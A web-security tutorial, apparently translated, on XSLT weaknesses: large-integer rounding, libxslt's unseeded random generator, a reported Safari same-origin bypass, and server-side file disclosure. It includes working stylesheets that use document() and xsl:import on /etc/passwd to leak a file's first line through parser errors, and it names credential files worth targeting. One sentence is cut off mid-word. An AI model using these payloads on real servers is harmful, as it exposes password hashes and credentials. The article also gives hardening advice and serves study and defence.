How to Use XSLT to Keep Attacking XML
0x00 Introduction
XSL
First, a note on the name: XSLT is best read as XSL-T. XSL stands for Extensible Stylesheet Language. The language is closely tied to XML: XSL is to XML what CSS is to HTML. Every HTML element is predefined (for example, <table> defines a table), so the browser already knows what the tag means and CSS only has to tell it how to display that table. In XML, however, any tag can be defined by the programmer, so a language such as XSL is needed to describe how an XML document should be displayed. Since this is a web security article we stay with web-related XSL security, and because browsers only implement XSLT 1.0, we only discuss version 1.0.
XSLT
XSL consists of three parts: XSLT, XPath and XSL-FO. In the security field XPath has already been studied by our predecessors (XPath injection), while almost nobody has paid attention to the other two. At last year's Black Hat conference a security firm, IOActive, finally shared its research on the subject, "Abusing XSLT for Practical Attacks". XSLT (the T stands for Transformations) is, as the name implies, used to transform XML into XHTML or other XML documents.
When XML is used to generate other documents (e.g. XHTML), the XSL stylesheet can be referenced from the XML document (via an xml-stylesheet processing instruction), or embedded directly inside the XML document.
To reason about XSLT security we have to consider where it is used. In this article we analyze vulnerabilities in XSLT implementations on both the client and the server side. To keep the discussion manageable, we restrict it to these implementations:
libxslt: provides XSLT processing for the Python, PHP, Perl and Ruby backends, and for the Safari, Opera and Chrome browsers.
Transformiix: discussed because it is the engine Firefox uses to process XSL.
Microsoft: needs no explanation. Microsoft's own IE uses Microsoft's own parsing library (MSXML).
0x01 attack model
Client/Server: number representation and arithmetic risks
XSL has its own "unique" understanding of mathematics. Let's first look at how it handles large integers:
Large Integers
For example, take an XML document containing a large integer and a stylesheet that outputs it (the original sample files are not reproduced here). In the libxslt-based processors (xsltproc, PHP, Perl, Ruby, Python, Safari, Chrome and Opera) the value is rendered as shown in the author's Chrome screenshot.
The problem is obvious: XPath 1.0 defines every number as an IEEE 754 double-precision float, so an integer above 2^53 cannot be represented exactly and is silently rounded, and each engine then prints the rounded value in its own format.
IOActive's paper gives the results of its research across the implementations.
Random Numbers
Similarly, some XSL vendors are quite casual about generating random numbers, and the careless vendor here is the most widely used one, libxslt. Because the library never seeds its random number generator, the "random" numbers it produces are identical on every run.
Let's bring this together with PRG for hi...
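The following probe stylesheet is an added example (not from the original article or from IOActive's paper). It exercises both issues at once: the double-precision rounding of large integer literals and the EXSLT math:random() function, so the output of different processors, and of repeated runs of the same processor, can be compared. It assumes a libxslt-based processor with EXSLT registered (xsltproc does this by default); the file name probe.xsl is arbitrary.

```xml
<?xml version="1.0"?>
<!-- probe.xsl: added example, not from the original article.
     A stylesheet is itself well-formed XML, so it can serve as its own input:
         xsltproc probe.xsl probe.xsl
     Run it twice and diff the two outputs; then run it under PHP, Perl or Ruby
     and compare how the same numbers are printed. -->
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:math="http://exslt.org/math"
    extension-element-prefixes="math">
  <xsl:output method="text"/>

  <xsl:template match="/">
    <!-- XPath 1.0 numbers are IEEE 754 doubles. 2^53 + 1 lies exactly between
         two representable doubles and rounds (ties-to-even) to 2^53, so the
         two literals below compare equal in every conforming engine; only the
         way the value is *printed* (all digits vs. scientific notation) differs. -->
    <xsl:text>2^53     : </xsl:text>
    <xsl:value-of select="9007199254740992"/>
    <xsl:text>&#10;2^53 + 1 : </xsl:text>
    <xsl:value-of select="9007199254740993"/>
    <xsl:text>&#10;equal?   : </xsl:text>
    <xsl:value-of select="9007199254740993 = 9007199254740992"/>
    <xsl:text>&#10;10^21    : </xsl:text>
    <xsl:value-of select="1000000000000000000000"/>

    <!-- EXSLT math:random(): as noted above, libxslt never seeds its generator,
         so this line repeats on every run of the same binary. -->
    <xsl:text>&#10;random   : </xsl:text>
    <xsl:value-of select="math:random()"/>
    <xsl:text>&#10;</xsl:text>
  </xsl:template>
</xsl:stylesheet>
```

The "equal?" line prints true on any XPath 1.0 engine; the interesting part is the digits printed for the two large literals, which are where implementations diverge, and the random line, which should change between runs and does not on an unseeded libxslt.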
Client: Safari SOP Bypass
Safari's same-origin policy (SOP) can also be broken by the XML stylesheet language.
As mentioned above, Safari has long supported transforming XML into XHTML in the browser. Using document() in XSLT, however, an attacker's page could read resources from another origin with that origin's cookies attached. The data is pulled in through document() → value-of()/copy-of(), and finally JavaScript in the transformed page sends it to the attacker, so user information can be stolen from other websites.
I reproduced the IOActive PoC, but my result differs from IOActive's:
In the IOActive report, the result is obtained successfully and the bypass works.
In my local test, the Safari console showed this message: clearly the request was blocked by the SOP.
Whether Apple has fixed the vulnerability or I used the wrong approach, I have put the PoC at the end of the article; you can download it and study it for yourself.
Server: Arbitrary File Reading
An XSLT transformation terminates immediately when an execution error occurs; like its sibling XML, it throws an error at the smallest mistake. The error message, however, can also hand useful information to an attacker.
XSLT offers three ways to read a file:
document(): accesses the contents of another XML document (also used for the cross-origin read above)
xsl:include: merges another stylesheet into the current one
xsl:import: imports another stylesheet, whose templates the importing stylesheet may override
For example, take stylesheet A, which calls document() on /etc/passwd, and stylesheet B, which imports A (the original sample files are not reproduced here).
When B is parsed it tries to load stylesheet A, and A tries to read /etc/passwd through document(). Obviously that file is not an XML document, so it cannot be read as one. Fortunately for the attacker, the parser error message echoes the first line of the target file.
Although only the first line is disclosed, that first line can already reveal a lot of sensitive information:
/etc/passwd: the Linux root account entry
/etc/shadow: the Linux root password hash
.htpasswd: an Apache basic-auth user's password hash
.pgpass: a PostgreSQL credential line (hostname:port:database:username:password)
This time all three methods (document(), xsl:import and xsl:include) are affected in all four libxslt consumers tested: xsltproc, PHP, Perl and Ruby.
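As an added example (not the article's own sample files), here are the two stylesheets described above in runnable form, together with the single-file variant that points xsl:import directly at the target. The file names a.xsl and b.xsl are arbitrary, and the expected error text assumes libxml2's standard parser-error format.

```xml
<!-- ===== a.xsl: added example, not the article's sample file =====
     Reads /etc/passwd through document(). The file is not XML, so libxml2
     fails to parse it and reports the offending line, i.e. the first line
     of the file. -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:copy-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

<!-- ===== b.xsl: imports a.xsl, which triggers the read when b.xsl is processed =====
     Any well-formed XML serves as input, e.g. the stylesheet itself:
         xsltproc b.xsl b.xsl
     Expected on stderr (libxml2 format; the echoed line is whatever the
     target file's first line is):
         /etc/passwd:1: parser error : Start tag expected, '<' not found
         root:x:0:0:root:/root:/bin/bash
         ^
     Replacing the import below with <xsl:import href="/etc/passwd"/> (or the
     equivalent xsl:include) leaks the same line without a second file. -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:import href="a.xsl"/>
</xsl:stylesheet>
```

Where the error text ends up depends on the host: xsltproc writes it to stderr, while the language bindings surface the same libxml2 message as a warning or exception (PHP's XSLTProcessor, for instance, raises an E_WARNING that display_errors will print straight into the HTTP response). When assessing a server, look for that libxml2 "parser error" string in responses and logs; when hardening one, disable external document loading in the processor and make sure libxml errors are never echoed to clients.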